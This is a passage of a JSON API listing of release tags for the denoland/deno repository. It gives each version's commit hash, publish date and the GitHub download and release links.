//repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_